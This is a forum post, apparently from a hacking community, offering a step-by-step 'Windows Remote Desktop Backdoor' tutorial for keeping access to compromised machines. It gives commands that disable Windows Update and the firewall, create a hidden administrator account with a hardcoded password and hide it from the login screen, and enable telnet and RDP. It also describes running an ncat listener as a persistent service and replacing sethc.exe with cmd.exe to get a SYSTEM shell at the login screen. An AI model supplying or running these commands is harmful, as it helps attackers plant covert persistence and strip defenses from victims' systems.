Windows Remote Desktop Backdoor

Asphyxia

Server Monkey
Administrator
Joined
Apr 25, 2015
Messages
1,196
Points
252
Age
26
Location
North America
USEFUL LINKS FOR MAINTAINING ACCESS
Non-Sucking Service Manager // http://nssm.cc/
NCAT // http://nmap.org/ncat/

TUTORIAL
I wrote a private tutorial on this a while ago and now I'm just going to publish it because no one else had something written as to-the-point and helpful as what I had written.

1. Run all of this shit:
Code:
sc config wuauserv start= disabled
net stop wuauserv
netsh firewall set opmode disable
sc config tlntsvr start= auto
net start telnet
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user support1 passwordA!1 /add
net localgroup "Administrators" /add support1
net localgroup "Users" /del support1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support1 /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f
net user support1 passwordA!1 /add --- this line creates the user with the username of support1.
I grabbed this from: http://www.windows-commandline.com/enable-remote-desktop-command-line/

2. Make sure the Terminal Service is running because the Terminal Server is what Remote Desktop runs as. Do this stuff:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f
net start termservice

3. Go ahead and try it, if it doesn't work try to reboot/restart the server and it should work or at least try stopping and starting the termservice.

ADDITIONAL HELP
Quote
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp\PortNumber
Is the location of the Remote Desktop port, if you find a program that is running on port 8080 or even port 80 and switch over the Remote Desktop port to 80/8080... this bypasses the need to port forward and since by default you can't back-connect or reverse-connect using remote desktop, this makes sense.

Lastly, use the NSSM to make ncat listen as a system service each time the computer starts up. This makes maintaining access very easy.

Alternatively you may be interested in enabling the Remote Desktop service, change sethc.exe inside the Windows System files to sethcbk.exe and copy cmd.exe to sethc.exe -- you will now connect to remote desktop and so long as authentication before screen view isn't enabled, you will see an ACTUAL screen with a login box. Tap shift 5 times and enjoy having a cmd window open with system level access. A simple and silly Windows fail.
 
Last edited:

Top